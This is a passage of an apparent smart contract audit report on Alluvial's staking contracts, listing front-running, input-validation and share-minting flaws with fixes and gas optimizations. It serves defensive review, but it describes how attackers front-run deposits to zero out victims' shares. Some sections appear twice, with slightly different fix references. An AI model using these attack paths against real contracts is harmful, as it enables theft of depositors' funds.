If a user calls the approve function a second time on a spender that was already allowed, the spender can front-run the transaction and call transferFrom() to transfer the previous value, and still receive the authorization to transfer the new value. Recommendation: Consider implementing functionality that allows a user to increase and decrease their allowance, similar to Lido's implementation. This will help prevent users from losing funds to front-running attacks. Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged. Note: if you want to follow the same logic as the OpenZeppelin ERC20 implementation, the _spendAllowance in both SharesManager and WLSETH should execute emit Approval(owner, spender, amount);. Alluvial: Fixed in PR 151. +6.3.10 Add missing input validation on constructor/initializer/setters Severity: Medium Risk Description: Allowlist.1.sol • initAllowlistV1 should require the _admin parameter to be not equal to address(0). This check is not needed if the fix for issue "LibOwnable._setAdmin allows setting address(0) as the admin of the contract" is implemented directly at the LibOwnable._setAdmin level. • allow should check _accounts[i] to be not equal to address(0). Firewall.sol • constructor should check that: governor_ != address(0), executor_ != address(0), destination_ != address(0). • setGovernor should check that newGovernor != address(0). • setExecutor should check that newExecutor != address(0). OperatorsRegistry.1.sol • initOperatorsRegistryV1 should require the _admin parameter to be not equal to address(0). This check is not needed if the fix for issue "LibOwnable._setAdmin allows setting address(0) as the admin of the contract" is implemented directly at the LibOwnable._setAdmin level. • addOperator should check: _name to not be an empty string, _operator to not be address(0), _feeRecipient to not be address(0). • setOperatorAddress should check that _newOperatorAddress is not address(0). • setOperatorFeeRecipientAddress should check that _newOperatorFeeRecipientAddress is not address(0). • setOperatorName should check that _newName is not an empty string. Oracle.1.sol • initOracleV1 should require the _admin parameter to be not equal to address(0). This check is not needed if the fix for issue "LibOwnable._setAdmin allows setting address(0) as the admin of the contract" is implemented directly at the LibOwnable._setAdmin level. Consider also adding some min and max limits to the values of _annualAprUpperBound and _relativeLowerBound, and be sure that _epochsPerFrame, _slotsPerEpoch, _secondsPerSlot and _genesisTime match the values expected. • addMember should check that _newOracleMember is not address(0). • setBeaconBounds: Consider adding min/max values that _annualAprUpperBound and _relativeLowerBound should respect. River.1.sol • initRiverV1: _globalFee should follow the same validation done in setGlobalFee. Note that the client said that 0 is a valid _globalFee value: "The revenue redistribution would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial." _operatorRewardsShare should follow the same validation done in setOperatorRewardsShare. Note that the client said that 0 is a valid _operatorRewardsShare value: "The revenue redistribution would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial."
ConsensusLayerDepositManager.1.sol • initConsensusLayerDepositManagerV1: _withdrawalCredentials should not be empty and should follow the requirements expressed in the official Consensus Specs document. Recommendation: Consider implementing all the checks suggested above. Alluvial: Recommendation implemented in SPEARBIT/10. Some validation checks, like the admin not being address(0), will be addressed in another PR. Spearbit: Only an empty check is performed on _withdrawalCredentials. _annualAprUpperBound and _relativeLowerBound are still not checked in both initOracleV1 and setReportBounds. +6.3.11 LibOwnable._setAdmin allows setting address(0) as the admin of the contract Severity: Medium Risk Context: LibOwnable.sol#L8-L10 Description: While other contracts like RiverAddress (for example) do not allow address(0) to be used as a set input parameter, there is no similar check inside LibOwnable._setAdmin. Because of this, contracts that call LibOwnable._setAdmin with address(0) will not revert, and functions that should be callable by an admin cannot be called anymore. This is the list of contracts that import and use the LibOwnable library: • AllowlistV1 • OperatorsRegistryV1 • OracleV1 • RiverV1 Recommendation: Consider adding a check inside LibOwnable._setAdmin to prevent setting address(0) as the admin, or move that specific check into each contract that imports and uses LibOwnable. Alluvial: Recommendation implemented in SPEARBIT/11. Spearbit: Note 1: Still missing (client said it will be implemented in other PRs): • Administrable misses all natspec comments • Events for _setAdmin are still missing but will be added to the Initializable event in another PR Note 2: Client has acknowledged that all the contracts that inherit from Administrable have the ability to transfer ownership, even contracts like AllowlistV1 that didn't have the ability before this PR. Alluvial: Issues in Note 1 addressed in SPEARBIT/33. Spearbit: Acknowledged. +6.3.12 OracleV1.getMemberReportStatus returns true for non existing oracles Severity: Medium Risk Context: Oracle.1.sol#L115-L118 Description: memberIndex will be equal to -1 for non-existing oracles, which will cause the mask to be equal to 0, which will cause the function to return true for non-existing oracles. Recommendation: Consider changing the function to return false for memberIndex = -1, but bear in mind that if this function is used directly inside some part of the logic it could allow a non-existing member to vote. In this case, the best solution is to always check whether the member exists by checking that memberIndex >= 0. The function could otherwise revert if the member does not exist, and return true/false if it does exist and has voted/not voted. If this solution is chosen, remember that integrating it directly into the code could create a DoS scenario if not handled correctly. For all these reasons, consider properly documenting the behavior of the function and the possible side effects in the natspec comment. Alluvial: Fixed in SPEARBIT/12 by returning false for non-existing oracles. Spearbit: Acknowledged. +6.3.13 Operators might add the same validator more than once Severity: Medium Risk Context: OperatorsRegistry.1.sol#L270 Description: Operators can use OperatorsRegistryV1.addValidators to add the same validator more than once. Depositors' funds will be directed to these duplicated addresses, which, in turn, will end up having more than 32 ETH.
This act will damage the capital efficiency of the entire deposit pool and thus will potentially impact the pool's APY. Recommendation: Consider adding a de-duplication mechanism. Alluvial: Acknowledged. +6.3.14 OracleManager.setBeaconData possible front running attacks Severity: Medium Risk Context: River.1.sol#L27 Description: The system is designed in a way that depositors receive shares (lsETH) in return for their ETH deposit. A share represents a fraction of the total ETH balance of the system at a given time. Investors can claim their staking profits by withdrawing once withdrawals are active in the system. Profits are being pulled from ELFeeRecipient to the River contract when the oracle is calling OracleManager.setBeaconData. setBeaconData updates BeaconValidatorBalanceSum, which might be increased or decreased (as a result of slashing, for instance). Investors have the ability to time their position in two main ways: • Investors might time their deposit just before profits are being distributed, thus harvesting profits made by others. • Investors might time their withdrawal / sell lsETH on secondary markets just before a loss is realized. By doing this, they will effectively avoid the loss, escaping the intended mechanism of socializing losses. Recommendation: As for the first issue, we recommend considering replacing the accounting logic with a different model that takes into account the timing of the deposit. In this case, as communicated with the team, oracles are supposed to call OracleManager.setBeaconData on a daily basis, which will limit the impact of such a strategy. However, we do recommend the off-chain monitoring of oracles' activity to make sure that the impact of this issue stays limited. The second issue will have to be tackled once there is more certainty about the withdrawal process. Alluvial: Resolved in SPEARBIT/13 Spearbit: It will solve the issue but will introduce further reliance on oracles, and will make it harder to track their performance in general. Alluvial: It indeed adds more opacity around operators, but all the keys are inside the contract and anyone could map the keys to the operators and track their performance. For now, we decided to move the operator rewards outside of River and we will use an approach that is similar to what we were doing on-chain at first, but we will work on adding more granularity to the rewards by taking into account how efficient their validators are. Adding this on-chain would make everything a lot more complicated; the oracle reports would need to perform a huge ton of extra work (we prefer having simple oracles that operators and integrators could easily run, so we'd rather increase the quorum as the protocol grows than require bigger hardware and make it a pain to operate). Spearbit: Acknowledged. +6.3.15 SharesManager._mintShares - Depositors may receive zero shares due to front-running Severity: Medium Risk Context: SharesManager.1.sol#L202 Description: The number of shares minted to a depositor is determined by (_underlyingAssetValue * _totalSupply()) / oldTotalAssetBalance. Potential attackers can spot a call to UserDepositManagerV1._deposit and front-run it with a transaction that sends wei to the contract (by self-destructing another contract and sending the funds to it), causing the victim to receive fewer shares than expected.
More specifically, in case oldTotalAssetBalance is greater than _underlyingAssetValue * _totalSupply(), the number of shares the depositor receives will be 0, although _underlyingAssetValue will still be pulled from the depositor's balance. An attacker with access to enough liquidity and to the mempool data can spot a call to UserDepositManagerV1._deposit and front-run it by sending at least totalSupplyBefore * (_underlyingAssetValue - 1) + 1 wei to the contract. This way, the victim will get 0 shares, but _underlyingAssetValue will still be pulled from its account balance. In this case, the attacker does not necessarily have to be a whitelisted user, and it is important to mention that the funds that were sent by him cannot be directly claimed back; rather, they will increase the price of the share. The attack vector mentioned above is the general front-runner case; the most profitable attack vector will be the case where the attacker is able to determine the share price (for instance, if the attacker mints the first share). In this scenario, the attacker will need to send at least attackerShares * (_underlyingAssetValue - 1) + 1 to the contract (attackerShares is completely controlled by the attacker, and thus can be 1). In our case, depositors are whitelisted, which makes this attack harder for a foreign attacker. Recommendation: Consider adding a validation check enforcing that sharesToMint > 0. Spearbit: The fix presented in issue "An attacker can freeze all incoming deposits and brick the oracle members' reporting system with only 1 wei" also fixes this vulnerability. 6.4 Low Risk +6.4.1 Orphaned (index, values) in SlotOperator storage slots in operatorsRegistry Severity: Low Risk Context: Operators.sol#L261-L263 Description: If !opExists corresponds to an operator which has OperatorResolution.active set to false, the line below can leave some orphaned (index, values) in SlotOperator storage slots: _setOperatorIndex(name, newValue.active, r.value.length - 1); Recommendation: In the case where !opExists corresponds to an operator which has OperatorResolution.active set to false, we can clear the storage for those operators, unless Alluvial would like to keep a record of those operators on-chain. Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14. Spearbit: Acknowledged. +6.4.2 A malicious operator can purposefully mismanage its validators to benefit from lsETH market price movements. Severity: Low Risk Context: operatorsRegistry/Operators.sol#L11 Description: At some point, an operator might find it beneficial to let its validators get slashed or just turn them off, while holding a short lsETH / WlsETH position on a market. The effect of this operator's validators getting slashed can move the market for those coins. If the operator is also able to calculate and time this market move precisely, they can take a flash loan to gain even higher leverage/reward. Related: LID-02, 5.4 Malicious Node Operators Alluvial: Acknowledged. +6.4.3 Warn the admin and the operator that setOperatorName has other side-effects Severity: Low Risk Context: OperatorsRegistry.1.sol#L196 Description: The admin and the operator need to be warned that setOperatorName sets OperatorResolution.active to true for this name as a side-effect. This warning is more important for the admin, since only active operators can call into this function. Alluvial: Resolved in SPEARBIT/14 by removing this function. Spearbit: Acknowledged.
+6.4.4 OperatorsRegistry.setOperatorName Possible front running attacks Severity: Low Context: OperatorsRegistry.1.sol#L196-L204 Description: 1. setOperatorName reverts for an already used name, which means that a call to setOperatorName might be front-run using the same name. The front-runner can launch the same attack again and again, thus causing a DoS for the original caller. 2. setOperatorName can be called either by an operator (to edit its own name) or by the admin. setOperatorName will revert for an already used _newName. The setOperatorName caller might be front-run by an identical transaction transmitted by someone else, which will lead to failure for their transaction, where in practice this failure is a "false failure" since the desired change was already made. Recommendation: 1. Consider changing the current mechanism to be based on a commit-reveal scheme. The idea is to add a commitName function that will store hash(msg.sender, _newName) for the msg.sender. This function will have to be called before the call to setOperatorName, which will implement the "reveal" side, validating that hash(msg.sender, _newName) exists and, if so, changing the previous name to the new name and clearing the value previously stored in commitName. 2. The off-chain code that calls setOperatorName should handle this case by querying the name of the operator even when the transaction fails; if it is the desired name, then it should be considered successful. Alluvial: Fixed in SPEARBIT/14. Spearbit: The provided PR resolves the issues above, but it allows duplicated names. Are you ok with that? Alluvial: Yes, we completely removed the name unicity and are now working entirely with indexes as unique identifiers. Names are considered as informational off-chain data now. It also makes things a lot easier to read imo. Spearbit: Acknowledged. +6.4.5 Prevent users from burning tokens via lsETH/wlsETH transfer or transferFrom functions Severity: Low Risk Context: SharesManager.1.sol#L158-L165, WLSETH.1.sol#L157-L165 Description: The current implementation of both lsETH (the SharesManager component of the River contract) and wlsETH allows the user to "burn" tokens, sending them directly to address(0) via the transfer and transferFrom functions. By doing that, a user would bypass the logic of the burn functions present in the protocol right now (or in the future, when withdrawals are enabled in River). Recommendation: Add a check to both _transfer functions to prevent the user from transferring tokens to address(0). Consider also adopting the same address(0) checks done by the OpenZeppelin ERC20 implementation, where needed and possible. Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged. 6.5 Gas Optimization +6.5.1 In addOperator when emitting an event use stack variables instead of reading from memory again Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L161 Description: In OperatorsRegistry's addOperator function, when emitting the AddedOperator event, we read from memory all the event parameters except operatorIndex. emit AddedOperator(operatorIndex, newOperator.name, newOperator.operator, newOperator.feeRecipient); We can avoid reading from memory to save gas. Recommendation: Use the stack variables already defined in the scope. emit AddedOperator(operatorIndex, _name, _operator, _feeRecipient); This would also be consistent with other events emitted in the functions defined in OperatorsRegistry. Alluvial: Implemented in PR 151.
The implementation is slightly different since _feeRecipient has been removed from the Operators.Operator struct. Spearbit: Acknowledged. +6.5.2 Avoid slicing and concatenating by passing a different pattern of bytes to addValidators Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L270, OperatorsRegistry.1.sol#L289-L292 Description/Recommendation: We can pass bytes calldata _publicKeys, bytes calldata _signatures also concatenated like ... and call that bytes calldata _publicKeysAndSignatures. This way we would only slice once in the for loop. Also, we can modify ValidatorKeys.set to accept a concatenated publicKey and signature. That way we can also avoid the concatenation that happens again in ValidatorKeys.set. ValidatorKeys.sol#L64-L65 function set(uint256 operatorIndex, uint256 idx, bytes memory publicKey, bytes memory signature) internal { bytes memory concatenatedKeys = BytesLib.concat(publicKey, signature); Alluvial: Implemented in SPEARBIT/24. Spearbit: Acknowledged. +6.5.3 Cache _indexes[_indexes.length - 1] in removeValidators to avoid reading from storage multiple times. Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L344-L345 Description/Recommendation: Cache _indexes[_indexes.length - 1] into a new variable to read it only once. testExecutorCanSetOperatorLimit() (gas: -1 (-0.000%)) testGovernorCanSetOperatorLimit() (gas: -1 (-0.000%)) Overall gas change: -2 (-0.000%) uint256 lastIndex = _indexes[_indexes.length - 1]; if (lastIndex < operator.limit) { operator.limit = lastIndex; } Alluvial: Recommendation implemented in PR SPEARBIT/24. Spearbit: Acknowledged. +6.5.4 Avoid updating operator.keys storage slot inside of a loop in removeValidators Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L310-L347 Description/Recommendation: Along with other minor gas optimizations, we can take the operator.keys update outside of the for loop to avoid updating this storage slot multiple times. testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -2 (-0.000%)) testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: 2 (0.000%)) testBurnWrappedTokens(uint256,uint32) (gas: -2 (-0.000%)) testTransferFrom(uint256,uint256,uint256,uint32) (gas: 4 (0.000%)) testBalanceOfEdits(uint256,uint32) (gas: -3 (-0.000%)) testRemoveMember(uint256) (gas: 2 (0.000%)) testTransfer(uint256,uint256,uint32) (gas: -5 (-0.000%)) testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -7 (-0.000%)) testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: 7 (0.000%)) testRemoveValidatorsKeyOutOfBounds(bytes32,uint256,uint256) (gas: -169 (-0.000%)) testRemoveValidatorsAndRetrieveAsAdmin(bytes32,uint256,uint256) (gas: -170 (-0.000%)) testRemoveValidatorsFundedKeyRemovalAttempt(bytes32,uint256,uint256) (gas: 215 (0.000%)) testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -5325 (-0.002%)) testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -5351 (-0.002%)) testRemoveValidatorsUnsortedIndexes(bytes32,uint256,uint256) (gas: -20864 (-0.014%)) testTotalSupply(uint256,uint128,uint128) (gas: -6700 (-0.058%)) testBreakingLowerBoundLimit(uint64,uint64,uint32) (gas: -19196 (-0.078%)) testSetBeaconBounds(uint256,uint64) (gas: -4800 (-0.171%)) Overall gas change: -62361 (-0.326%) An example of a different implementation: function removeValidators(uint256 _index, uint256[] calldata _indexes) external operatorOrAdmin(_index)
Alluvial: Recommendation implemented in SPEARBIT/9.

Spearbit: Acknowledged.

6.5 Gas Optimization

+6.5.1 In addOperator when emitting an event use stack variables instead of reading from memory again

Severity: Gas Optimization

Context: OperatorsRegistry.1.sol#L161

Description: In OperatorsRegistry's addOperator function, when emitting the AddedOperator event, we read all the event parameters except operatorIndex from memory.

emit AddedOperator(operatorIndex, newOperator.name, newOperator.operator, newOperator.feeRecipient);

We can avoid reading from memory to save gas.

Recommendation: Use the stack variables already defined in the scope.

emit AddedOperator(operatorIndex, _name, _operator, _feeRecipient);

This would also be consistent with other events emitted in the functions defined in OperatorsRegistry.

Alluvial: Implemented in PR 151. The implementation is slightly different since _feeRecipient has been removed from the Operators.Operator struct.

Spearbit: Acknowledged.

+6.5.2 Avoid slicing and concatenating by passing a different pattern of bytes to addValidators

Severity: Gas Optimization

Context: OperatorsRegistry.1.sol#L270, OperatorsRegistry.1.sol#L289-L292

Description/Recommendation: Instead of bytes calldata _publicKeys and bytes calldata _signatures, we can pass the keys and signatures already concatenated together as a single bytes calldata _publicKeysAndSignatures. This way we would only slice once in the for loop. Also, we can modify ValidatorKeys.set to accept a concatenated publicKey and signature; that way we can also avoid the concatenation that happens again in ValidatorKeys.set.

ValidatorKeys.sol#L64-L65

function set(uint256 operatorIndex, uint256 idx, bytes memory publicKey, bytes memory signature) internal {
    bytes memory concatenatedKeys = BytesLib.concat(publicKey, signature);
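A minimal sketch of the calldata layout this enables; the 48/96-byte key and signature sizes match the deposit contract, while the length check, error name and operator.keys-based write index are illustrative:

uint256 internal constant PUBLIC_KEY_LENGTH = 48;
uint256 internal constant SIGNATURE_LENGTH = 96;
uint256 internal constant RECORD_LENGTH = PUBLIC_KEY_LENGTH + SIGNATURE_LENGTH; // 144 bytes per validator

function addValidators(uint256 _index, uint256 _keyCount, bytes calldata _publicKeysAndSignatures) external {
    // ... existing authorization checks ...
    if (_publicKeysAndSignatures.length != _keyCount * RECORD_LENGTH) {
        revert InvalidKeysLength(); // hypothetical error
    }
    Operators.Operator storage operator = Operators.getByIndex(_index);
    for (uint256 idx = 0; idx < _keyCount; ++idx) {
        // one calldata slice per validator replaces one slice for the key,
        // one for the signature, and the concatenation inside ValidatorKeys.set
        ValidatorKeys.set(_index, operator.keys + idx, _publicKeysAndSignatures[idx * RECORD_LENGTH:(idx + 1) * RECORD_LENGTH]);
    }
    operator.keys += _keyCount;
}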
Alluvial: Implemented in SPEARBIT/24.

Spearbit: Acknowledged.

+6.5.3 Cache _indexes[_indexes.length - 1] in removeValidators to avoid reading from storage multiple times

Severity: Gas Optimization

Context: OperatorsRegistry.1.sol#L344-L345

Description/Recommendation: Cache _indexes[_indexes.length - 1] into a new variable to read it only once.

testExecutorCanSetOperatorLimit() (gas: -1 (-0.000%))
testGovernorCanSetOperatorLimit() (gas: -1 (-0.000%))
Overall gas change: -2 (-0.000%)

uint256 lastIndex = _indexes[_indexes.length - 1];
if (lastIndex < operator.limit) {
    operator.limit = lastIndex;
}

Alluvial: Recommendation implemented in PR SPEARBIT/24.

Spearbit: Acknowledged.

+6.5.4 Avoid updating operator.keys storage slot inside of a loop in removeValidators

Severity: Gas Optimization

Context: OperatorsRegistry.1.sol#L310-L347

Description/Recommendation: Along with other minor gas optimizations, we can take the operator.keys updates outside of the for loop to avoid updating this storage slot multiple times. The update can happen once after the loop.

testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -2 (-0.000%))
testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: 2 (0.000%))
testBurnWrappedTokens(uint256,uint32) (gas: -2 (-0.000%))
testTransferFrom(uint256,uint256,uint256,uint32) (gas: 4 (0.000%))
testBalanceOfEdits(uint256,uint32) (gas: -3 (-0.000%))
testRemoveMember(uint256) (gas: 2 (0.000%))
testTransfer(uint256,uint256,uint32) (gas: -5 (-0.000%))
testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -7 (-0.000%))
testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: 7 (0.000%))
testRemoveValidatorsKeyOutOfBounds(bytes32,uint256,uint256) (gas: -169 (-0.000%))
testRemoveValidatorsAndRetrieveAsAdmin(bytes32,uint256,uint256) (gas: -170 (-0.000%))
testRemoveValidatorsFundedKeyRemovalAttempt(bytes32,uint256,uint256) (gas: 215 (0.000%))
testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -5325 (-0.002%))
testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -5351 (-0.002%))
testRemoveValidatorsUnsortedIndexes(bytes32,uint256,uint256) (gas: -20864 (-0.014%))
testTotalSupply(uint256,uint128,uint128) (gas: -6700 (-0.058%))
testBreakingLowerBoundLimit(uint64,uint64,uint32) (gas: -19196 (-0.078%))
testSetBeaconBounds(uint256,uint64) (gas: -4800 (-0.171%))
Overall gas change: -62361 (-0.326%)

An example of a different implementation:

function removeValidators(uint256 _index, uint256[] calldata _indexes) external operatorOrAdmin(_index) {
    uint256 indexesLength = _indexes.length;
    if (indexesLength == 0) {
        revert InvalidKeyCount();
    }
    Operators.Operator storage operator = Operators.getByIndex(_index);
    uint256 totalKeys = operator.keys;
    if (!(_indexes[0] < totalKeys)) {
        revert InvalidIndexOutOfBounds();
    }
    uint256 lastIndex = _indexes[_indexes.length - 1];
    if (lastIndex < operator.funded) {
        revert InvalidFundedKeyDeletionAttempt();
    }
    if (lastIndex < operator.limit) {
        operator.limit = lastIndex;
    }
    operator.keys = totalKeys - indexesLength;
    uint256 idx;
    for (; idx < indexesLength;) {
        uint256 keyIndex = _indexes[idx];
        if (idx > 0 && !(keyIndex < _indexes[idx - 1])) {
            revert InvalidUnsortedIndexes();
        }
        unchecked {
            ++idx;
        }
        uint256 lastKeyIndex = totalKeys - idx;
        (bytes memory removedPublicKey,) = ValidatorKeys.get(_index, keyIndex);
        (bytes memory lastPublicKey, bytes memory lastSignature) = ValidatorKeys.get(_index, lastKeyIndex);
        ValidatorKeys.set(_index, keyIndex, lastPublicKey, lastSignature);
        ValidatorKeys.set(_index, lastKeyIndex, new bytes(0), new bytes(0));
        emit RemovedValidatorKey(_index, removedPublicKey);
    }
}

Alluvial: Implemented in SPEARBIT/24.

Spearbit: Acknowledged.
+6.5.5 Cache storage related variables in WLSETH.1.sol::burn to save gas

Severity: Gas Optimization

Context: WLSETH.1.sol#L140-L151

Description/Recommendation: We can cache IRiverV1(payable(RiverAddress.get())) and BalanceOf.get(msg.sender) to avoid reading from storage multiple times.

testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -2 (-0.000%))
testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: 10 (0.000%))
testRemoveMember(uint256) (gas: 2 (0.000%))
testTransferFrom(uint256,uint256,uint256,uint32) (gas: -580 (-0.002%))
testTransfer(uint256,uint256,uint32) (gas: -611 (-0.002%))
testTotalSupplyEdits(uint256,uint32) (gas: -587 (-0.003%))
testBalanceOfEdits(uint256,uint32) (gas: -590 (-0.003%))
testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -592 (-0.003%))
testBurnWrappedTokens(uint256,uint32) (gas: -587 (-0.003%))
testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: -593 (-0.003%))
testBalanceOfEditsMultiBurnsMultiUserAndRebase(uint256,uint256) (gas: -3550 (-0.010%))
testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -3557 (-0.014%))
testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -3552 (-0.014%))
testSetBeaconBounds(uint256,uint64) (gas: -4800 (-0.171%))
Overall gas change: -19589 (-0.227%)

function burn(address _recipient, uint256 _value) external nonReentrant {
    IRiverV1 river = IRiverV1(payable(RiverAddress.get()));
    uint256 balance = BalanceOf.get(msg.sender);
    uint256 callerUnderlyingBalance = river.underlyingBalanceFromShares(balance);
    if (_value > callerUnderlyingBalance) {
        revert BalanceTooLow();
    }
    uint256 sharesAmount = river.sharesFromUnderlyingBalance(_value);
    BalanceOf.set(msg.sender, balance - sharesAmount);
    if (!river.transfer(_recipient, sharesAmount)) {
        revert TokenTransferError();
    }
}

Alluvial: The final implementation is a bit different, but the caching suggestions have been applied in PRs:
• [SPEARBIT/5] Remove dust on WLSETH burn
• [SPEARBIT/33] Documentation and natspec

Spearbit: Acknowledged.

+6.5.6 Replace pad64 with abi.encodePacked

Severity: Gas Optimization

Context: ConsensusLayerDepositManager.1.sol#L109, ConsensusLayerDepositManager.1.sol#L113

Description/Recommendation: Using the native abi.encodePacked, just like the Ethereum 2.0 deposit contract, instead of pad64 would save a considerable amount of gas. And since these are the only 2 places where BytesLib.pad64 is used, we can remove this helper function from the codebase, unless the team is planning to use it elsewhere.

testInitWithZeroAddressValue() (gas: -24260 (-0.009%))
testUserDepositsOperatorWithStoppedValiadtors() (gas: -39038 (-0.018%))
testUserDepositsForAnotherUser() (gas: -44258 (-0.019%))
testDeniedUser() (gas: -44258 (-0.019%))
testELFeeRecipientPullFunds() (gas: -44258 (-0.019%))
testUserDeposits() (gas: -44258 (-0.019%))
testNoELFeeRecipient() (gas: -44258 (-0.019%))
testUserDepositsTenPercentFee() (gas: -44258 (-0.019%))
testUserDepositsFullAllowance() (gas: -44258 (-0.019%))
testUserDepositsUnconventionalDeposits() (gas: -44740 (-0.019%))
testValidatorsPenaltiesEqualToExecLayerFees() (gas: -44258 (-0.020%))
testValidatorsPenalties() (gas: -44258 (-0.020%))
testDepositTwentyValidators() (gas: -12938 (-0.023%))
testDepositTenValidators() (gas: -12938 (-0.023%))
Overall gas change: -532236 (-0.265%)

bytes32 pubkeyRoot = sha256(abi.encodePacked(_publicKey, bytes16(0)));
bytes32 signatureRoot = sha256(
    abi.encodePacked(
        sha256(BytesLib.slice(_signature, 0, 64)),
        sha256(abi.encodePacked(BytesLib.slice(_signature, 64, SIGNATURE_LENGTH - 64), bytes32(0)))
    )
);

Alluvial: Resolved in SPEARBIT/6.

Spearbit: Acknowledged.

+6.5.7 Unroll loops with a fixed number of iterations to avoid extra gas costs

Severity: Gas Optimization

Context: Uint256Lib.sol#L8-L13

Description/Recommendation: Since the number of loop iterations is known at compile time, we can unroll the loop to avoid the extra variable on the stack (i) and also avoid the conditional JUMPI and JUMPDEST opcodes. Here is what the unrolling would look like:

result = temp_value & 0xFF;
temp_value >>= 8;
result = (result << 8) | (temp_value & 0xFF);
temp_value >>= 8;
result = (result << 8) | (temp_value & 0xFF);
temp_value >>= 8;
result = (result << 8) | (temp_value & 0xFF);
temp_value >>= 8;
result = (result << 8) | (temp_value & 0xFF);
temp_value >>= 8;
result = (result << 8) | (temp_value & 0xFF);
temp_value >>= 8;
result = (result << 8) | (temp_value & 0xFF);
temp_value >>= 8;
result = (result << 8) | (temp_value & 0xFF);
temp_value >>= 8;

and the overall gas saving:

testInitWithZeroAddressValue() (gas: 9430 (0.004%))
testUserDepositsOperatorWithStoppedValiadtors() (gas: -14790 (-0.007%))
testUserDepositsForAnotherUser() (gas: -16762 (-0.007%))
testDeniedUser() (gas: -16762 (-0.007%))
testELFeeRecipientPullFunds() (gas: -16762 (-0.007%))
testUserDepositsUnconventionalDeposits() (gas: -16762 (-0.007%))
testUserDeposits() (gas: -16762 (-0.007%))
testNoELFeeRecipient() (gas: -16762 (-0.007%))
testUserDepositsTenPercentFee() (gas: -16762 (-0.007%))
testUserDepositsFullAllowance() (gas: -16762 (-0.007%))
testValidatorsPenaltiesEqualToExecLayerFees() (gas: -16762 (-0.007%))
testValidatorsPenalties() (gas: -16762 (-0.008%))
testDepositTwentyValidators() (gas: -4930 (-0.009%))
testDepositTenValidators() (gas: -4930 (-0.009%))
Overall gas change: -182840 (-0.093%)

It would be best to define a constant for 0xFF as well. Note that the deposit contract uses a method similar to the unrolled loop here.

Alluvial: Recommendation implemented in SPEARBIT/25.

Spearbit: Acknowledged.
+6.5.8 Rewrite pad64 so that it doesn't use BytesLib.concat and BytesLib.slice to save gas

Severity: Gas Optimization

Context: BytesLib.sol#L5-L21

Description: We can avoid using BytesLib.concat and BytesLib.slice and write pad64 mostly in assembly, since the current implementation causes more memory expansion than needed (and is also not highly optimized).

Recommendation: Here is an implementation mostly in assembly (note the shift amount must be expressed in bits, i.e. 8 times the number of padding bytes):

function pad64(bytes memory _b) internal pure returns (bytes memory res) {
    assert(_b.length >= 32 && _b.length <= 64);
    if (64 == _b.length) {
        return _b;
    }
    assembly {
        // load free memory pointer
        let freeMemPtr := mload(0x40)
        res := freeMemPtr
        // store length of the new array as 0x40 = 64
        mstore(freeMemPtr, 0x40)
        // advance free memory pointer
        freeMemPtr := add(freeMemPtr, 0x20)
        // store the 1st 32 bytes of `_b` in the next memory slot
        mstore(freeMemPtr, mload(add(_b, 0x20)))
        // advance free memory pointer
        freeMemPtr := add(freeMemPtr, 0x20)
        // _b[32:64)
        let endChunk := mload(add(_b, 0x40))
        // shift value in bits: 8 * the number of bytes needed to pad `_b` to 64 bytes
        let shiftValue := shl(3, sub(0x40, mload(_b)))
        // mask the padded part
        endChunk := shl(shiftValue, shr(shiftValue, endChunk))
        // store padded end of `_b`
        mstore(freeMemPtr, endChunk)
        // advance free memory pointer
        freeMemPtr := add(freeMemPtr, 0x20)
        // update the value at the free memory pointer slot
        mstore(0x40, freeMemPtr)
    }
}

And a snapshot of gas savings:

testInitWithZeroAddressValue() (gas: -33876 (-0.013%))
testUserDepositsOperatorWithStoppedValiadtors() (gas: -45518 (-0.021%))
testUserDepositsForAnotherUser() (gas: -51602 (-0.022%))
testDeniedUser() (gas: -51602 (-0.022%))
testELFeeRecipientPullFunds() (gas: -51602 (-0.022%))
testUserDeposits() (gas: -51602 (-0.022%))
testNoELFeeRecipient() (gas: -51602 (-0.022%))
testUserDepositsTenPercentFee() (gas: -51602 (-0.022%))
testUserDepositsUnconventionalDeposits() (gas: -52084 (-0.022%))
testUserDepositsFullAllowance() (gas: -51602 (-0.022%))
testValidatorsPenaltiesEqualToExecLayerFees() (gas: -51602 (-0.023%))
testValidatorsPenalties() (gas: -51602 (-0.023%))
testDepositTwentyValidators() (gas: -15178 (-0.027%))
testDepositTenValidators() (gas: -15178 (-0.027%))
Overall gas change: -626252 (-0.311%)

The assert statement can also be changed to use strict inequalities to further save gas:

-assert(_b.length >= 32 && _b.length <= 64)
+assert(_b.length > 31 && _b.length < 65)

It would be best to define constants for the literals in the implementation for better readability.

Alluvial: Resolved by SPEARBIT/6 since it has been removed from the code base.

Spearbit: Acknowledged.

+6.5.9 Cache r.value.length used in a loop condition to avoid reading from storage multiple times

Severity: Gas Optimization

Context: Operators.sol#L167, Operators.sol#L181, Operators.sol#L207, Operators.sol#L221

Description: In a loop like the one below, consider caching the r.value.length value to avoid reading from storage on every round of the loop.

for (uint256 idx = 0; idx < r.value.length;) {

Recommendation: Consider implementing the code below.

uint256 idx;
uint256 length = r.value.length;
